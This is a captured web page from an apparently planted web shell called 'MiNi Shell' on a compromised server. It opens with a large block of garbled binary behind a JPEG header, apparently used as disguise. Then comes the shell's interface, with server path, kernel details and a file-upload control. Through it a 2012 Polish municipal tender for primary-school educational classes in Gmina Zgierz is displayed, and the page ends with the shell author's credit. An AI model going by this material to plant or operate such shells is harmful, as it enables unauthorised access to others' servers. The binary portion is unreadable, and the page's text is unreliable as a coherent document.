JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/15612-N-2012.html

<p class="kh_header"><b>Zgierz: Przeprowadzenie zajęć edukacyjnych dla uczniów klas I-III szkół podstawowych prowadzonych przez Gminę Zgierz.</b><br>
<b>Numer ogłoszenia: 15612 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zgierz , ul. Łęczycka 4, 95-100 Zgierz, woj. łódzkie, tel. 042 7162515, faks 042 7164554.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć edukacyjnych dla uczniów klas I-III szkół podstawowych prowadzonych przez Gminę Zgierz..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie zajęć edukacyjnych dla uczniów klas
I-III szkół podstawowych prowadzonych przez Gminę Zgierz - uczestników projektu
Indywidualność siłą współfinansowanego ze środków Unii Europejskiej w ramach
Europejskiego Funduszu Społecznego.
Zajęcia edukacyjne skierowane są do uczniów kl. I-III siedmiu szkół podstawowych prowadzonych przez Gminę Zgierz. Przewiduje się objęcie wsparciem uczniów, którzy mają specjalne potrzeby edukacyjne. Ze względu na cechujące uczniów bariery edukacyjne, posiadane zainteresowania i talenty, zostaną oni objęci dodatkowymi zajęciami odpowiadającymi ich indywidualnym potrzebom. Część dzieci zostanie objęta wsparciem w eliminowaniu wad wymowy, postawy, zaburzeń komunikacji społecznej, specyficznych trudności w nauce jęz. polskiego i matematyki. Część dzieci zostanie objęta zajęciami mającymi na celu rozwój uzdolnień i zainteresowań.
Uczniowie zostali wytypowani do udziału w projekcie na podstawie diagnozy
przeprowadzonej przez specjalne zespoły, utworzone w tym celu w poszczególnych
szkołach. Celem projektu Indywidualność siłą jest zwiększenie dostosowania
procesu edukacyjnego do indywidualnych potrzeb uczniów kl. I - III siedmiu szkół
podstawowych z terenu Gminy Zgierz. Wykonawca jest zobowiązany do:
1. przeprowadzenia Terapii pedagogicznej w Szkole Podstawowej w Dąbrówce Wielkiej w liczbie 136 godzin
2. przeprowadzenia Terapii pedagogicznej w Szkole Podstawowej w Giecznie w liczbie 210 godzin
3. przeprowadzenia Terapii pedagogicznej w Szkole Podstawowej w Szczawinie w liczbie 60 godzin
4. przeprowadzenia Socjoterapii w Szkole Podstawowej w Białej w liczbie 60 godzin
5. przeprowadzenia Socjoterapii w Szkole Podstawowej w Słowiku w liczbie 60 godzin
6. przeprowadzenia Zajęć logopedycznych w Szkole Podstawowej w Besiekierzu Rudnym w liczbie 180 godzin
7. przeprowadzenia Zajęć logopedycznych w Szkole Podstawowej w Białej w liczbie 180 godzin
8. przeprowadzenia Zajęć logopedycznych w Szkole Podstawowej w Giecznie w liczbie 300 godzin
9. przeprowadzenia Zajęć logopedycznych w Szkole Podstawowej w Szczawinie w liczbie 300 godzin
10. przeprowadzenia Zajęć logopedycznych w Szkole Podstawowej w Słowiku w liczbie 120 godzin
11. przeprowadzenia Zajęć dydaktyczno-wyrównawczych z edukacji polonistycznej w Szkole Podstawowej w Besiekierzu Rudnym w liczbie 180 godzin
12. przeprowadzenia Zajęć korekcyjno-kompensacyjnych dla dzieci z trudnościami w czytaniu i pisaniu w Szkole Podstawowej w Białej w liczbie 60 godzin
13. przeprowadzenia Zajęć dydaktyczno-wyrównawczych dla uczniów z trudnościami w czytaniu i pisaniu w Szkole Podstawowej w Szczawinie w liczbie 180 godzin
14. przeprowadzenia Zajęć dydaktyczno-wyrównawczych dla dzieci z trudnościami w czytaniu i pisaniu w Szkole Podstawowej w Słowiku w liczbie 120 godzin
15. przeprowadzenia Zajęć dydaktyczno-wyrównawczych z edukacji matematycznej w Szkole Podstawowej w Besiekierzu Rudnym w liczbie 180 godzin
16. przeprowadzenia Zajęć dydaktyczno-wyrównawczych z matematyki w Szkole
Podstawowej w Białej w liczbie 60 godzin
17. przeprowadzenia Zajęć dydaktyczno-wyrównawczych z matematyki w Szkole
Podstawowej w Szczawinie w liczbie 60 godzin
18. przeprowadzenia Zajęć dydaktyczno-wyrównawczych z matematyki w Szkole
Podstawowej w Słowiku w liczbie 120 godzin
19. przeprowadzenia Zajęć rozwijających zdolności matematyczno-przyrodnicze w Szkole Podstawowej w Białej w liczbie 60 godzin
20. przeprowadzenia Zajęcia rozwijające zdolności matematyczno-przyrodnicze w Szkole Podstawowej w Giecznie w liczbie 60 godzin
21. przeprowadzenia Zajęcia rozwijające zdolności matematyczno-przyrodnicze w Szkole Podstawowej w Szczawinie w liczbie 60 godzin
22. przeprowadzenia Zajęć rozwijających zdolności matematyczno-przyrodnicze w Szkole Podstawowej w Słowiku w liczbie 60 godzin
23. przeprowadzenia Zajęć rozwijających zdolności przyrodnicze w Szkole Podstawowej w Grotnikach w liczbie 68 godzin
24. przeprowadzenia Zajęć rozwijających zdolności taneczno-ruchowe w Szkole
Podstawowej w Dąbrówce Wielkiej w liczbie 68 godzin
25. przeprowadzenia Zajęć rozwijających zdolności teatralno-recytatorskie w Szkole Podstawowej w Białej w liczbie 60 godzin
26. przeprowadzenia Zajęć rozwijających zdolności teatralne w Szkole Podstawowej w Grotnikach w liczbie 68 godzin
27. przeprowadzenia Zajęć rozwijających zdolności sportowe w Szkole Podstawowej w Białej w liczbie 60 godzin
28. przeprowadzenia Zajęć rozwijających zdolności humanistyczne w Szkole Podstawowej w Słowiku w liczbie 60 godzin
29.przeprowadzenia Zajęć rozwijających zdolności muzyczne w Szkole Podstawowej w Słowiku w liczbie 60 godzin
30. przeprowadzenia Zajęć rozwijających zdolności plastyczne w Szkole Podstawowej w Dąbrówce Wielkiej w liczbie 68 godzin
31. przeprowadzenia Zajęć rozwijających zdolności plastyczne w Szkole Podstawowej w Szczawinie w liczbie 60 godzin
32. przeprowadzenia Zajęć rozwijających zdolności plastyczne w Szkole Podstawowej w Grotnikach w liczbie 68 godzin
33. opieki nad dziećmi w czasie dowozu i odwozu dzieci z basenu a takSe w czasie
pobytu dzieci na basenie oraz monitorowanie postępu w eliminowaniu wad postawy w związku z Zajęciami dla dzieci z wadami postawy - pływanie (SP Grotniki)
realizowanymi w trakcie 150 godz. zajęć (50 wizyt na basenie x 3 godz.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-0, 80.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 33.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować kadrą zdolną do wykonania zamówienia przy zachowaniu zasady, że osoba prowadząca zajęcia posiada wykształcenie,
kwalifikacje i doświadczenie w zakresie poszczególnych części, tj.:
Terapia pedagogiczna, socjoterapia, logopedia (dotyczy części 1-10)
1. ukończone studia magisterskie na kierunku (specjalności) zgodnym
z prowadzonymi zajęciami oraz posiadanie przygotowania pedagogicznego lub
2. ukończone studia magisterskie na kierunku (specjalności) innym niż w pkt 1
i studia podyplomowe lub kurs kwalifikacyjny w zakresie prowadzonych zajęć
oraz posiadanie przygotowania pedagogicznego,
3. co najmniej roczne doświadczenie w wykonywaniu pracy nauczyciela.
Zajęcia dydaktyczno- wyrównawcze oraz zajęcia rozwijające zdolności
matematyczno-przyrodnicze, przyrodnicze i humanistyczne (dotyczy części 11- 24)
. ukończone studia magisterskie na kierunku pedagogicznym w specjalności
przygotowującej do pracy z dziećmi w wieku wczesnoszkolnym lub
. ukończone studia magisterskie na kierunku innym niż w pkt 1 i studia podyplomowe
lub kurs kwalifikacyjny w zakresie specjalności przygotowującej do pracy z dziećmi
w wieku wczesnoszkolnym,
. co najmniej roczne doświadczenie w wykonywaniu pracy nauczyciela.
Zajęcia rozwijające zdolności taneczno-ruchowe, teatralno-recytatorskie, teatralne,
sportowe, muzyczne, plastyczne (dotyczy części 25- 32).
1. ukończone studia magisterskie na kierunku pedagogicznym w specjalności
przygotowującej do pracy z dziećmi w wieku wczesnoszkolnym lub
2. ukończone studia magisterskie na kierunku innym niż w pkt 1 i studia
podyplomowe lub kurs kwalifikacyjny w zakresie specjalności przygotowującej
do pracy z dziećmi w wieku wczesnoszkolnym lub
3. ukończone studia magisterskie w zakresie ww. zajęć oraz posiadanie
przygotowania pedagogicznego
4. co najmniej roczne doświadczenie w wykonywaniu pracy nauczyciela.
Zajęcia dla dzieci z wadami postawi - pływanie (opiekun) ( dotyczy części 33)
1. ukończone studia magisterskie w zakresie wychowania fizycznego i studia
podyplomowe lub kurs kwalifikacyjny w zakresie gimnastyki korekcyjnej
oraz posiadanie przygotowania pedagogicznego lub
2. ukończone studia magisterskie na kierunku innym niż w pkt 1 i studia
podyplomowe lub kurs kwalifikacyjny w zakresie gimnastyki korekcyjnej oraz posiadanie przygotowania pedagogicznego,
3. co najmniej roczne doświadczenie w wykonywaniu pracy nauczyciela.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o podwykonawcach.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dokonanie zmian jest możliwe w przypadku wystąpienia co najmniej jednej
z okoliczności wymienionych poniżej, z uwzględnieniem warunków ich
wprowadzania:
W zakresie zmian spowodowanych następującymi okolicznościami:
1) Zmiana liczby godzin zajęć
2) Zmiana Liczby Uczestników
3) Zmiana liczby grup
4) Zmiana sposobu rozliczania umowy lub płatności na rzecz Wykonawcy na skutek
zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu
lub wytycznych dotyczących realizacji projektu,
5) Rezygnacja przez zamawiającego z realizacji części przedmiotu umowy,
6) W przypadku zaistnienia innej okoliczności prawnej, ekonomicznej
lub organizacyjnej skutkującej niemożnością wykonania lub należytego wykonania
umowy zgodnie ze SWIZ.
. W przypadku wystąpienia okoliczności wymienionych powyżej w pkt. 1), 2) i 3),
zmiany dotyczyć mogą wynagrodzenia za przeprowadzoną liczbę godzin
. W przypadku pkt. 4) zmiany dostosują sposób rozliczeń lub płatności do wymogów
zmienionej umowy o dofinansowanie projektu lub nowych wytycznych dotyczących
realizacji projektu.
. W przypadku pkt. 5) i 6)) zmiany mogą dotyczyć zakresu podmiotowego
wykonywanych zajęć edukacyjnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gmina.zgierz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zgierz, ul. Łęczycka 4 , pok. 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 09:30, miejsce: Urząd Gminy Zgierz, ul. Łęczycka 4, Biuro Obsługi Klienta, Stanowisko Nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest przeprowadzenie zajęć edukacyjnych dla uczniów klas
I-III szkół podstawowych prowadzonych przez Gminę Zgierz - uczestników projektu
Indywidualność siłą. Projekt jest współfinansowany ze środków Unii Europejskiej
w ramach Europejskiego Funduszu Społecznego
Projekt jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki,
Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,
Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości
usług edukacyjnych świadczonych w systemie oświaty,
Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup
o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług
edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com